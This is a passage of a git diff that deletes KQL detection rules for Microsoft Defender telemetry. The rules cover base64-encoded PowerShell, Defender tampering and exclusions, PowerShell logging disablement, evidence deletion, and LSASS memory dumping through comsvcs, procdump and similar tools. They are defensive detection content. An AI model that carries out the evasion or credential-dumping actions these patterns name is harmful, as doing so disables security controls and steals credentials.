"bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA" or ProcessCommandLine contains "WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" \ No newline at end of file 
diff --git a/Defense Evasion/PowerShell_Base64_Encoded_WMI_Classes.kql b/Defense Evasion/PowerShell_Base64_Encoded_WMI_Classes.kql deleted file mode 100644 index 78c3b4de..00000000 --- a/Defense Evasion/PowerShell_Base64_Encoded_WMI_Classes.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/30 -// Level: high -// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc. -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and ((ProcessCommandLine contains "VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg" or ProcessCommandLine contains "V2luMzJfTG9nZ2VkT25Vc2Vy" or ProcessCommandLine contains "dpbjMyX0xvZ2dlZE9uVXNlc" or ProcessCommandLine contains "XaW4zMl9Mb2dnZWRPblVzZX") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw" or ProcessCommandLine contains "cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA" or ProcessCommandLine contains "V2luMzJfUHJvY2Vzc" or ProcessCommandLine contains "dpbjMyX1Byb2Nlc3" or ProcessCommandLine contains "XaW4zMl9Qcm9jZXNz") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg" or ProcessCommandLine contains "V2luMzJfU2NoZWR1bGVkSm9i" or ProcessCommandLine contains "dpbjMyX1NjaGVkdWxlZEpvY" or ProcessCommandLine contains "XaW4zMl9TY2hlZHVsZWRKb2") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A" or ProcessCommandLine contains 
"V2luMzJfU2hhZG93Y29we" or ProcessCommandLine contains "dpbjMyX1NoYWRvd2NvcH" or ProcessCommandLine contains "XaW4zMl9TaGFkb3djb3B5") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A" or ProcessCommandLine contains "cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA" or ProcessCommandLine contains "V2luMzJfVXNlckFjY291bn" or ProcessCommandLine contains "dpbjMyX1VzZXJBY2NvdW50" or ProcessCommandLine contains "XaW4zMl9Vc2VyQWNjb3Vud")) \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Console_History_Logs_Deleted.kql b/Defense Evasion/PowerShell_Console_History_Logs_Deleted.kql deleted file mode 100644 index 9b323c33..00000000 --- a/Defense Evasion/PowerShell_Console_History_Logs_Deleted.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/15 -// Level: medium -// Description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence -// Tags: attack.defense_evasion, attack.t1070 -DeviceFileEvents -| where FolderPath endswith "\\PSReadLine\\ConsoleHost_history.txt" \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Core_DLL_Loaded_Via_Office_Application.kql b/Defense Evasion/PowerShell_Core_DLL_Loaded_Via_Office_Application.kql deleted file mode 100644 index 999c9ee8..00000000 --- a/Defense Evasion/PowerShell_Core_DLL_Loaded_Via_Office_Application.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/01 -// Level: medium -// Description: Detects PowerShell core DLL being loaded by an Office Product -// Tags: attack.defense_evasion -DeviceImageLoadEvents -| where (FolderPath contains "\\System.Management.Automation.Dll" or FolderPath contains "\\System.Management.Automation.ni.Dll") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Logging_Disabled_Via_Registry_Key_Tampering.kql b/Defense Evasion/PowerShell_Logging_Disabled_Via_Registry_Key_Tampering.kql deleted file mode 100644 index dd39645e..00000000 --- a/Defense Evasion/PowerShell_Logging_Disabled_Via_Registry_Key_Tampering.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/04/02 -// Level: high -// Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging -// Tags: attack.defense_evasion, attack.t1564.001 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\Microsoft\\Windows\\PowerShell" or RegistryKey contains "\\Microsoft\\PowerShellCore") and (RegistryKey endswith "\\ModuleLogging\\EnableModuleLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockInvocationLogging" or RegistryKey endswith "\\Transcription\\EnableTranscripting" or RegistryKey endswith "\\Transcription\\EnableInvocationHeader" or RegistryKey endswith "\\EnableScripts") \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Script_Change_Permission_Via_Set-Acl.kql b/Defense Evasion/PowerShell_Script_Change_Permission_Via_Set-Acl.kql deleted file mode 100644 index 5e298951..00000000 --- a/Defense Evasion/PowerShell_Script_Change_Permission_Via_Set-Acl.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/18 -// Level: high -// Description: Detects PowerShell execution to set the ACL of a file or a folder -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject " and ProcessCommandLine contains "-Path ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/Defense Evasion/PowerShell_Set-Acl_On_Windows_Folder.kql b/Defense Evasion/PowerShell_Set-Acl_On_Windows_Folder.kql deleted file mode 100644 index b53f42c8..00000000 
--- a/Defense Evasion/PowerShell_Set-Acl_On_Windows_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/18 -// Level: high -// Description: Detects PowerShell scripts to set the ACL to a file in the Windows folder -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "-Path \"C:\\Windows" or ProcessCommandLine contains "-Path 'C:\\Windows" or ProcessCommandLine contains "-Path %windir%" or ProcessCommandLine contains "-Path $env:windir") and (ProcessCommandLine contains "FullControl" or ProcessCommandLine contains "Allow") \ No newline at end of file diff --git a/Defense Evasion/Powershell_Base64_Encoded_MpPreference_Cmdlet.kql b/Defense Evasion/Powershell_Base64_Encoded_MpPreference_Cmdlet.kql deleted file mode 100644 index fc55890a..00000000 --- a/Defense Evasion/Powershell_Base64_Encoded_MpPreference_Cmdlet.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/04
-// Level: high
-// Description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "QWRkLU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "BZGQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "U2V0LU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "TZXQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "YWRkLW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "hZGQtbXBwcmVmZXJlbmNlI" or ProcessCommandLine contains "c2V0LW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "zZXQtbXBwcmVmZXJlbmNlI") or (ProcessCommandLine contains "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA")
\ No newline at end of file
diff --git a/Defense Evasion/Powershell_Defender_Disable_Scan_Feature.kql b/Defense Evasion/Powershell_Defender_Disable_Scan_Feature.kql
deleted file mode 100644
index f715383e..00000000
--- a/Defense Evasion/Powershell_Defender_Disable_Scan_Feature.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/03 -// Level: high -// Description: Detects requests to disable Microsoft Defender features using PowerShell commands -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains "DisableArchiveScanning " or ProcessCommandLine contains "DisableRealtimeMonitoring " or ProcessCommandLine contains "DisableIOAVProtection " or ProcessCommandLine contains "DisableBehaviorMonitoring " or ProcessCommandLine contains "DisableBlockAtFirstSeen " or ProcessCommandLine contains "DisableCatchupFullScan " or ProcessCommandLine contains "DisableCatchupQuickScan ") and (ProcessCommandLine contains "$true" or ProcessCommandLine contains " 1 ")) or ((ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA" or ProcessCommandLine contains 
"EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA") or (ProcessCommandLine contains "ZGlzYWJsZWFyY2hpdmVzY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVhcmNoaXZlc2Nhbm5pbmcg" or ProcessCommandLine contains "kaXNhYmxlYXJjaGl2ZXNjYW5uaW5nI" or ProcessCommandLine contains "RGlzYWJsZUFyY2hpdmVTY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVBcmNoaXZlU2Nhbm5pbmcg" or ProcessCommandLine contains "EaXNhYmxlQXJjaGl2ZVNjYW5uaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJlaGF2aW9ybW9uaXRvcmluZy" or 
ProcessCommandLine contains "Rpc2FibGViZWhhdmlvcm1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlYmVoYXZpb3Jtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZUJlaGF2aW9yTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVCZWhhdmlvck1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlQmVoYXZpb3JNb25pdG9yaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJsb2NrYXRmaXJzdHNlZW4g" or ProcessCommandLine contains "Rpc2FibGVibG9ja2F0Zmlyc3RzZWVuI" or ProcessCommandLine contains "kaXNhYmxlYmxvY2thdGZpcnN0c2Vlbi" or ProcessCommandLine contains "RGlzYWJsZUJsb2NrQXRGaXJzdFNlZW4g" or ProcessCommandLine contains "Rpc2FibGVCbG9ja0F0Rmlyc3RTZWVuI" or ProcessCommandLine contains "EaXNhYmxlQmxvY2tBdEZpcnN0U2Vlbi" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBmdWxsc2Nhbi" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwZnVsbHNjYW4g" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cGZ1bGxzY2FuI" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBGdWxsU2Nhbi" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwRnVsbFNjYW4g" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cEZ1bGxTY2FuI" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBxdWlja3NjYW4g" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwcXVpY2tzY2FuI" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cHF1aWNrc2Nhbi" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBRdWlja1NjYW4g" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwUXVpY2tTY2FuI" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cFF1aWNrU2Nhbi" or ProcessCommandLine contains "ZGlzYWJsZWlvYXZwcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVpb2F2cHJvdGVjdGlvbi" or ProcessCommandLine contains "kaXNhYmxlaW9hdnByb3RlY3Rpb24g" or ProcessCommandLine contains "RGlzYWJsZUlPQVZQcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVJT0FWUHJvdGVjdGlvbi" or ProcessCommandLine contains "EaXNhYmxlSU9BVlByb3RlY3Rpb24g" or ProcessCommandLine contains "ZGlzYWJsZXJlYWx0aW1lbW9uaXRvcmluZy" or ProcessCommandLine contains 
"Rpc2FibGVyZWFsdGltZW1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlcmVhbHRpbWVtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVSZWFsdGltZU1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlUmVhbHRpbWVNb25pdG9yaW5nI"))
\ No newline at end of file
diff --git a/Defense Evasion/Powershell_Defender_Exclusion.kql b/Defense Evasion/Powershell_Defender_Exclusion.kql
deleted file mode 100644
index 72f711b3..00000000
--- a/Defense Evasion/Powershell_Defender_Exclusion.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/04/29
-// Level: medium
-// Description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains " -ExclusionPath " or ProcessCommandLine contains " -ExclusionExtension " or ProcessCommandLine contains " -ExclusionProcess " or ProcessCommandLine contains " -ExclusionIpAddress ")
\ No newline at end of file
diff --git a/Defense Evasion/Powershell_Token_Obfuscation_-_Process_Creation.kql b/Defense Evasion/Powershell_Token_Obfuscation_-_Process_Creation.kql
deleted file mode 100644
index 2e4c9b07..00000000
--- a/Defense Evasion/Powershell_Token_Obfuscation_-_Process_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/27
-// Level: high
-// Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
-// Tags: attack.defense_evasion, attack.t1027.009
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "\\w+`(\\w+|-|.)`[\\w+|\\s]" or ProcessCommandLine matches regex ""(\\{\\d\\})+"\\s*-f" or ProcessCommandLine matches regex "\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}"
\ No newline at end of file
diff --git a/Defense Evasion/Powerup_Write_Hijack_DLL.kql b/Defense Evasion/Powerup_Write_Hijack_DLL.kql
deleted file mode 100644
index b2cd19b0..00000000
--- a/Defense Evasion/Powerup_Write_Hijack_DLL.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Subhash Popuri (@pbssubhash)
-// Date: 2021/08/21
-// Level: high
-// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
-In it's default mode, it builds a self deleting .bat file which executes malicious command.
-The detection rule relies on creation of the malicious bat file (debug.bat by default).
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat"
\ No newline at end of file
diff --git a/Defense Evasion/Prefetch_File_Deleted.kql b/Defense Evasion/Prefetch_File_Deleted.kql
deleted file mode 100644
index c59b8323..00000000
--- a/Defense Evasion/Prefetch_File_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Cedric MAURUGEON
-// Date: 2021/09/29
-// Level: high
-// Description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceFileEvents
-| where (FolderPath contains ":\\Windows\\Prefetch\\" and FolderPath endswith ".pf") and (not((InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" and (RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI"))))
\ No newline at end of file
diff --git a/Defense Evasion/PrintBrm_ZIP_Creation_of_Extraction.kql b/Defense Evasion/PrintBrm_ZIP_Creation_of_Extraction.kql
deleted file mode 100644
index 833c963a..00000000
--- a/Defense Evasion/PrintBrm_ZIP_Creation_of_Extraction.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/02
-// Level: high
-// Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
-// Tags: attack.command_and_control, attack.t1105, attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -f" and ProcessCommandLine contains ".zip") and FolderPath endswith "\\PrintBrm.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Procdump_Execution.kql b/Defense Evasion/Procdump_Execution.kql
deleted file mode 100644
index e0baffc1..00000000
--- a/Defense Evasion/Procdump_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/16
-// Level: medium
-// Description: Detects usage of the SysInternals Procdump utility
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Process_Access_via_TrolleyExpress_Exclusion.kql b/Defense Evasion/Process_Access_via_TrolleyExpress_Exclusion.kql
deleted file mode 100644
index 3f8a20a2..00000000
--- a/Defense Evasion/Process_Access_via_TrolleyExpress_Exclusion.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/10
-// Level: high
-// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
-// Tags: attack.defense_evasion, attack.t1218.011, attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\TrolleyExpress 7" or ProcessCommandLine contains "\\TrolleyExpress 8" or ProcessCommandLine contains "\\TrolleyExpress 9" or ProcessCommandLine contains "\\TrolleyExpress.exe 7" or ProcessCommandLine contains "\\TrolleyExpress.exe 8" or ProcessCommandLine contains "\\TrolleyExpress.exe 9" or ProcessCommandLine contains "\\TrolleyExpress.exe -ma ") or (FolderPath endswith "\\TrolleyExpress.exe" and (not((isnull(ProcessVersionInfoOriginalFileName) or ProcessVersionInfoOriginalFileName contains "CtxInstall"))))
\ No newline at end of file
diff --git a/Defense Evasion/Process_Creation_Using_Sysnative_Folder.kql b/Defense Evasion/Process_Creation_Using_Sysnative_Folder.kql
deleted file mode 100644
index f767153d..00000000
--- a/Defense Evasion/Process_Creation_Using_Sysnative_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022/08/23
-// Level: medium
-// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055
-DeviceProcessEvents
-| where ProcessCommandLine contains ":\\Windows\\Sysnative\\" or FolderPath contains ":\\Windows\\Sysnative\\"
\ No newline at end of file
diff --git a/Defense Evasion/Process_Memory_Dump_Via_Comsvcs.DLL.kql b/Defense Evasion/Process_Memory_Dump_Via_Comsvcs.DLL.kql
deleted file mode 100644
index 2530eb6f..00000000
--- a/Defense Evasion/Process_Memory_Dump_Via_Comsvcs.DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/02/18
-// Level: high
-// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1036, attack.t1003.001, car.2013-05-009
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") and ((ProcessCommandLine contains "#-" or ProcessCommandLine contains "#+" or ProcessCommandLine contains "#24" or ProcessCommandLine contains "24 " or ProcessCommandLine contains "MiniDump") and (ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))) or ((ProcessCommandLine contains " #" or ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #") and (ProcessCommandLine contains "24" and ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))
\ No newline at end of file
diff --git a/Defense Evasion/Process_Memory_Dump_Via_Dotnet-Dump.kql b/Defense Evasion/Process_Memory_Dump_Via_Dotnet-Dump.kql
deleted file mode 100644
index fddf31d9..00000000
--- a/Defense Evasion/Process_Memory_Dump_Via_Dotnet-Dump.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: medium
-// Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "collect" and (FolderPath endswith "\\dotnet-dump.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-dump.dll")
\ No newline at end of file
diff --git a/Defense Evasion/Process_Proxy_Execution_Via_Squirrel.EXE.kql b/Defense Evasion/Process_Proxy_Execution_Via_Squirrel.EXE.kql
deleted file mode 100644
index 864ecfca..00000000
--- a/Defense Evasion/Process_Proxy_Execution_Via_Squirrel.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
